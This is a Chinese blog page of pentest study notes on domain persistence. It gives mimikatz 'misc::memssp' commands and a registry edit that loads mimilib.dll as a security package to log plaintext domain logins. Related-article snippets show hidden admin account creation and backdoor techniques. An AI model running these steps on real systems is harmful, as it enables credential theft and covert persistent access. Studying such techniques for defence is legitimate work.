内网安全--权限维持

最新推荐文章于 2024-09-08 23:49:54 发布

划水yyds

最新推荐文章于 2024-09-08 23:49:54 发布

阅读量844

点赞数

文章标签：安全

本文链接：https://blog.csdn.net/weixin_58782362/article/details/127705084

版权

权限维持：为攻击者创造出稳定的输出

域环境的权限维持、单机版的权限维持、web权限维持

#内网域-权限维持-基于验证DLL加载-SSP

启用mimikatz需要用管理员身份

方法一：但如果域控制器，被注入的内存的伪造的ssp将会丢失

privilege::debug

misc::memssp

C:\Windows\System32\mimilsa.log 记录登录的账号密码（前提条件是需要在线切换用户，且服务器不重启）

方法二：使用此方法即使系统重启，也不会影响到持久化的效果

1、mimilib.dll 传到目标域控的c:\windows\system32\目录下

2、修改注册表，重启生效

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

c:\windows\system32\kiwissp.log 记录账号密码文件

在实战中一般都是将两种方法同时一起使用

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

划水yyds

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

内网渗透-域内的权限维持

lza20001103的博客

10-01

1081

域内的权限维持文章目录域内的权限维持前言PTTTGT（黄金票据）sspSkeleton KeySID History后记前言上期我们讲了windows和Linux中的权限维持，这期我们讲一下域内的权限维持，权限维持是后渗透必不可少的环节，大家一定要好好掌握啊。 PTT PTT（票据） window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE

参与评论您还未登录，请先登录后发表或查看评论

内网渗透-windows权限维持的方法

lza20001103的博客

08-26

1263

windows权限维持的方法文章目录windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用

内网渗透——权限维持

cldimd的博客

03-23

1231

一、权限维持：当攻击者获取服务器权限后，通常会采用一些后门技术来维持自己当前得到的权限，服务器一旦被植入后门，那么攻击者下次进入就方便多了。由于攻击可能被发现，会清除一些shell，导致目标丢失，所以需要留下后门来维持权限，达到持续控制的目的。二、获取windows系统登陆账号：系统登陆账号存储位置：C:\Windows\System32...

内网权限维持

wuxinweii的博客

11-10

2832

攻击者在提升权限后，往往会通过建立后门来维持对目标主机的控制权。这样一来，即使修复了被攻击者利用的系统漏洞，攻击者还是可以通过后门继续控制目标系统一、粘贴键后门 windows 系统下连续按 5 次 shift 可调出其程序，粘滞键是为了那些按钮有困难的人设计的，就是按键困难，那么如果用 ctrl+c，ctrl+v 这种快捷键或者其他需要组合的键时，就会有困难，不具备一次按两个或多个键的能力，那么此时就可以单按 5 下 shift 键来启动粘滞键功能。所以我们可以通过更改注册表的命令来进行后门维持在命

什么是权限维持

最新发布

m0_57836225的博客

09-08

371

权限维持是指在成功获取系统或网络的访问权限后，采取一系列技术手段来确保这种权限能够持续存在，不被轻易发现和清除。

web端权限维持

wodafa的博客

02-27

1321

前言关于权限维持，我之前写过一篇基于系统端的后门技术文章，如映像劫持啊，lpk之类。当然啦，在拿到权限后，在web端做手脚也是个好办法。 PS：还是希望论坛早点支持markdown哦，不然排版很是费劲。内容目录： - 构造文件包含漏洞 - 隐蔽性脚本木马 - 构造sql注入点正文 0x01 构造文件包含漏洞 >**本部分概览：** > * 基本的文

内网渗透-linux权限维持

lza20001103的博客

08-25

918

内网渗透-linux权限维持文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录（高版本）没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务反弹shell 添加用户 UID=0是最高权限的用户，有时候不能被远程登录，可以创建一个普通用户。正常可以通过 “id” 来查看当前的用户的U

内网渗透-Linux权限维持

lza20001103的博客

09-26

2423

Linux权限维持文章目录Linux权限维持前言ssh后门Setuid and SetgidLinux隐藏技术后记前言前面讲解了window中的权限维持的方法，本期给大家讲解一下Linux中权限维持的方法，内容比较少，大家还是能掌握尽量都掌握吧，在以后的工作渗透中，也是需要用上的。 ssh后门过滤 ps -elf |grep 12345 监听端口 nc -lvvp 123 查看端口 netstat -anlp|grep 12345 （1）ssh后门（脚本内容）（192.168.231.134） #!

内网渗透-window权限维持

lza20001103的博客

09-26

2262

window权限维持文章目录window权限维持前言meterpreter权限维持persistencemetsvc系统工具替换后门iexplore.exenarratoroskutilmannotepadmsf模块开机自启动注册表项nc后门schtasks快捷方式劫持账号隐藏后记前言上期讲完了横向移动后，我们拿到了管理员的权限，当我们离开时，下一次要是还想拿到的是管理员的权限呢，难道我们还要继续一波操作提取啥的吗，其实不然，接下来将是最重要的内容，就是我们的权限维持的操作了，对于后渗透有着至关重要的

windows内网渗透--权限维持

weixin_47099592的博客

07-03

770

scr 文件实际上是一个可执行文件，类似于 .exe 文件。它们可以包含相同的代码，并且可以执行相同的任务。注释掉#source /etc/network/interfaces.d/*这个见我上一篇文章，这个还有个思路就是劫持后可以写一个添加管理员用户。将Administrator账户所复制的值，粘贴到hack。成功实现最基础的windows run注册表持久化。攻击机 kali 192.168.1.100。复制Administrator 中的F键值。接下来我们实现最简单的windows持久化。

内网学习第十二天--权限维持

m0_59134926的博客

12-20

1048

大体上来讲，这几种权限维持的方法都是通过服务或者注册表，使一些木马开机时自动运行，就可以实现权限维持。1.使用msf的exploit/windows/local/persistence_service模块2.使用msf的post/windows/manage/persistence_exe模块3.使用msf的exploit/windows/local/registry_persistence模块4.使用nc进行权限维持5.使用远程桌面进行权限维持。

内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持

weixin_45701675的博客

04-25

894

内网安全之权限维持

内网渗透之权限维持

welcome.php

06-08

2065

这里写目录标题1介绍2普通权限3高级权限 1介绍 2普通权限 3高级权限 1

内网渗透系列：权限维持方法小结

闵行小鱼塘

08-02

2457

小结下权限维持方法

Windows权限维持

谢公子的博客

05-28

2313

目录创建隐蔽账号进程迁移启动目录横向渗透在红蓝对抗实战中，当我们获取到一台Windows主机的权限后，首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强，并且他们的流量监测设备也在不断监控，如果发现机器被植入木马，他们肯定会采取措施。比如采取以下几点措施：查杀木马进程重启主机断网关闭主机而对于我们维持权限，可以有以下几点：创建隐蔽账号如果目标主机的3389端口开放着，则我们可以创建隐蔽账号。或者读取该主机administrator账号密码，使用

内网安全：PTH、PTK与PTT哈希票据攻击策略解析

内网安全-域横向PTH、PTK和PTT哈希票据传递是针对Windows域环境中的一种高级渗透技术。Kerberos协议是核心环节，它涉及以下几个步骤： 1. **密码哈希传递** (PTH): 用户的明文密码首先经过NTLM哈希，与时间戳一起...